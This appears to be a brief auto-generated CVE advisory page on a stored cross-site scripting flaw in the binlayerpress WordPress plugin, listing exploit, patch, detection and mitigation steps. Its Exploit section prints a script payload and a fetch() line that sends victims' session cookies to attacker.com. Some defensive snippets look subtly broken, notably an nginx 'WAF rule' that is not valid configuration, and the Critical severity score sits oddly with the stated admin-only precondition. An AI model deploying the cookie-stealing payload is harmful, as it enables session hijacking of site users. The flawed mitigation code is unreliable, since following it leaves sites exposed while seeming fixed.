How the CVE Works
The `binlayerpress` plugin (≤ v1.1) for WordPress fails to sanitize admin settings inputs, allowing attackers with admin privileges to inject malicious scripts. These scripts persist in the database and execute when users load compromised pages. The vulnerability is exploitable only in multi-site setups or where `unfiltered_html` is disabled, as WordPress normally strips scripts via KSES. The stored XSS attack vector (CVSS 4.0: 9.6 Critical) enables session hijacking, defacement, or malware delivery.
DailyCVE Form
Platform: WordPress
Version: ≤1.1
Vulnerability: Stored XSS
Severity: Critical
Date: 04/07/2025
What Undercode Say:
Exploit:
1. Payload Injection:
<script>alert(document.cookie)</script>
Insert via plugin settings (requires admin access).
2. Exfiltrate Sessions:
fetch('https://attacker.com/steal?data='+btoa(document.cookie));
Protection:
1. Patch:
wp plugin update binlayerpress --version=1.2
2. Sanitization Bypass Fix:
add_filter('pre_update_option_binlayerpress', 'sanitize_text_field');
Detection:
1. Scan Plugin:
grep -r "echo $_POST" /wp-content/plugins/binlayerpress/
Mitigation:
1. Disable Plugin:
wp plugin deactivate binlayerpress
2. WAF Rule:
location ~ /wp-admin/..php {
deny <script>;
}
Forensics:
1. Log Analysis:
cat /var/log/nginx/access.log | grep "binlayerpress"
References:
- CVE-2025-2076: Wordfence Advisory
- Patch: GitHub/binlayerpresscommit
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-2076
Extra Source Hub:
Undercode
